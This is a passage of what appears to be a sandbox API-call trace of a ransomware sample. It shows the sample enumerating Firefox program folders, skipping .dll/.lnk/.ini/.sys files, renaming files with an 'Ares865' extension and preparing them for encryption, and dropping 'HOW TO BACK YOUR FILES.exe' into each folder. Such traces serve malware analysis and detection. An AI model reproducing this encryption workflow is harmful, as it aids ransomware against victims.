ftLastAccessTime.dwLowDateTime=0x523efca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523efca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.006] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.006] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.006] lstrcpyW (in: lpString1=0x2cce46a, lpString2="channel-prefs.js" | out: lpString1="channel-prefs.js") returned="channel-prefs.js" [0128.007] lstrlenW (lpString="channel-prefs.js") returned 16 [0128.007] lstrlenW (lpString="Ares865") returned 7 [0128.007] lstrcmpiW (lpString1="refs.js", lpString2="Ares865") returned 1 [0128.007] lstrlenW (lpString=".dll") returned 4 [0128.007] lstrcmpiW (lpString1="channel-prefs.js", lpString2=".dll") returned 1 [0128.007] lstrlenW (lpString=".lnk") returned 4 [0128.007] lstrcmpiW (lpString1="channel-prefs.js", lpString2=".lnk") returned 1 [0128.007] lstrlenW (lpString=".ini") returned 4 [0128.007] lstrcmpiW (lpString1="channel-prefs.js", lpString2=".ini") returned 1 [0128.007] lstrlenW (lpString=".sys") returned 4 [0128.007] lstrcmpiW (lpString1="channel-prefs.js", lpString2=".sys") returned 1 [0128.007] lstrlenW (lpString="channel-prefs.js") returned 16 [0128.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js.Ares865") returned 77 [0128.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js.ares865"), dwFlags=0x1) returned 1 [0128.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=358) returned 1 [0128.010] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.011] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.011] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.011] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x170 [0128.013] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0128.013] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.014] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.014] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.015] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser" [0128.015] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser" [0128.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.016] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.016] GetLastError () returned 0x0 [0128.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.016] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523efca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523efca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.017] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.017] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.017] lstrcpyW (in: lpString1=0x2cce45e, lpString2="blocklist.xml.Ares865" | out: lpString1="blocklist.xml.Ares865") returned="blocklist.xml.Ares865" [0128.017] lstrlenW (lpString="blocklist.xml.Ares865") returned 21 [0128.017] lstrlenW (lpString="Ares865") returned 7 [0128.017] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.017] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf261fa0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x132cbe00, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome.manifest", cAlternateFileName="CHROME~1.MAN")) returned 1 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2="aoldtz.exe") returned 1 [0128.017] lstrcpyW (in: lpString1=0x2cce45e, lpString2="chrome.manifest" | out: lpString1="chrome.manifest") returned="chrome.manifest" [0128.017] lstrlenW (lpString="chrome.manifest") returned 15 [0128.017] lstrlenW (lpString="Ares865") returned 7 [0128.017] lstrcmpiW (lpString1="anifest", lpString2="Ares865") returned -1 [0128.017] lstrlenW (lpString=".dll") returned 4 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2=".dll") returned 1 [0128.017] lstrlenW (lpString=".lnk") returned 4 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2=".lnk") returned 1 [0128.017] lstrlenW (lpString=".ini") returned 4 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2=".ini") returned 1 [0128.017] lstrlenW (lpString=".sys") returned 4 [0128.017] lstrcmpiW (lpString1="chrome.manifest", lpString2=".sys") returned 1 [0128.017] lstrlenW (lpString="chrome.manifest") returned 15 [0128.018] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.Ares865") returned 70 [0128.018] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest.ares865"), dwFlags=0x1) returned 1 [0128.019] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.019] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40) returned 1 [0128.020] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.020] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.020] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.020] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x170 [0128.022] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0128.023] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.024] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.024] lstrcpyW (in: lpString1=0x2cce45e, lpString2="components" | out: lpString1="components") returned="components" [0128.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1708 [0128.024] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.024] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf261fa0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xd9ee5100, ftLastWriteTime.dwHighDateTime=0x1ced1d0, nFileSizeHigh=0x0, nFileSizeLow=0x30f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashreporter-override.ini", cAlternateFileName="CRASHR~1.INI")) returned 1 [0128.024] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.025] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2="aoldtz.exe") returned 1 [0128.025] lstrcpyW (in: lpString1=0x2cce45e, lpString2="crashreporter-override.ini" | out: lpString1="crashreporter-override.ini") returned="crashreporter-override.ini" [0128.025] lstrlenW (lpString="crashreporter-override.ini") returned 26 [0128.025] lstrlenW (lpString="Ares865") returned 7 [0128.025] lstrcmpiW (lpString1="ide.ini", lpString2="Ares865") returned 1 [0128.025] lstrlenW (lpString=".dll") returned 4 [0128.025] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2=".dll") returned 1 [0128.025] lstrlenW (lpString=".lnk") returned 4 [0128.025] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2=".lnk") returned 1 [0128.025] lstrlenW (lpString=".ini") returned 4 [0128.025] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2=".ini") returned 1 [0128.025] lstrlenW (lpString=".sys") returned 4 [0128.025] lstrcmpiW (lpString1="crashreporter-override.ini", lpString2=".sys") returned 1 [0128.025] lstrlenW (lpString="crashreporter-override.ini") returned 26 [0128.025] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini.Ares865") returned 81 [0128.025] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini.ares865"), dwFlags=0x1) returned 1 [0128.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.027] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=783) returned 1 [0128.027] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.028] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x610, lpName=0x0) returned 0x170 [0128.029] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x610) returned 0x190000 [0128.030] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.031] lstrcpyW (in: lpString1=0x2cce45e, lpString2="extensions" | out: lpString1="extensions") returned="extensions" [0128.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0128.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1788 [0128.031] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0128.032] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x523efca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x523efca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.032] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.032] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf261fa0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x57748a00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x44080e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="omni.ja", cAlternateFileName="")) returned 1 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2="aoldtz.exe") returned 1 [0128.032] lstrcpyW (in: lpString1=0x2cce45e, lpString2="omni.ja" | out: lpString1="omni.ja") returned="omni.ja" [0128.032] lstrlenW (lpString="omni.ja") returned 7 [0128.032] lstrlenW (lpString="Ares865") returned 7 [0128.032] lstrlenW (lpString=".dll") returned 4 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2=".dll") returned 1 [0128.032] lstrlenW (lpString=".lnk") returned 4 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2=".lnk") returned 1 [0128.032] lstrlenW (lpString=".ini") returned 4 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2=".ini") returned 1 [0128.032] lstrlenW (lpString=".sys") returned 4 [0128.032] lstrcmpiW (lpString1="omni.ja", lpString2=".sys") returned 1 [0128.032] lstrlenW (lpString="omni.ja") returned 7 [0128.032] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja.Ares865") returned 62 [0128.032] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja.ares865"), dwFlags=0x1) returned 1 [0128.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.034] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4458510) returned 1 [0128.034] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.035] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.035] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.035] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x440b10, lpName=0x0) returned 0x170 [0128.036] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x40b10) returned 0x420000 [0128.050] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3030000 [0128.159] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.173] lstrcpyW (in: lpString1=0x2cce45e, lpString2="searchplugins" | out: lpString1="searchplugins") returned="searchplugins" [0128.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0128.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0128.173] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0128.173] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf288100, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x52488220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="searchplugins", cAlternateFileName="SEARCH~1")) returned 0 [0128.173] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.173] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0128.173] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins" [0128.173] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins" [0128.173] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.173] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.175] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.175] GetLastError () returned 0x0 [0128.176] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.176] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf288100, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x52488220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.176] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.176] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.176] lstrcpyW (in: lpString1=0x2cce47a, lpString2="amazondotcom.xml.Ares865" | out: lpString1="amazondotcom.xml.Ares865") returned="amazondotcom.xml.Ares865" [0128.176] lstrlenW (lpString="amazondotcom.xml.Ares865") returned 24 [0128.176] lstrlenW (lpString="Ares865") returned 7 [0128.176] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.176] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf288100, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5243bf60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bing.xml.Ares865", cAlternateFileName="BINGXM~1.ARE")) returned 1 [0128.176] lstrcmpiW (lpString1="bing.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.176] lstrcmpiW (lpString1="bing.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.176] lstrcpyW (in: lpString1=0x2cce47a, lpString2="bing.xml.Ares865" | out: lpString1="bing.xml.Ares865") returned="bing.xml.Ares865" [0128.176] lstrlenW (lpString="bing.xml.Ares865") returned 16 [0128.177] lstrlenW (lpString="Ares865") returned 7 [0128.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf288100, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x524620c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eBay.xml.Ares865", cAlternateFileName="EBAYXM~1.ARE")) returned 1 [0128.177] lstrcmpiW (lpString1="eBay.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.177] lstrcmpiW (lpString1="eBay.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.177] lstrcpyW (in: lpString1=0x2cce47a, lpString2="eBay.xml.Ares865" | out: lpString1="eBay.xml.Ares865") returned="eBay.xml.Ares865" [0128.177] lstrlenW (lpString="eBay.xml.Ares865") returned 16 [0128.177] lstrlenW (lpString="Ares865") returned 7 [0128.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2ae260, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf2ae260, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x524620c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="google.xml.Ares865", cAlternateFileName="GOOGLE~1.ARE")) returned 1 [0128.177] lstrcmpiW (lpString1="google.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.177] lstrcmpiW (lpString1="google.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.177] lstrcpyW (in: lpString1=0x2cce47a, lpString2="google.xml.Ares865" | out: lpString1="google.xml.Ares865") returned="google.xml.Ares865" [0128.177] lstrlenW (lpString="google.xml.Ares865") returned 18 [0128.177] lstrlenW (lpString="Ares865") returned 7 [0128.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52415e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52415e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, 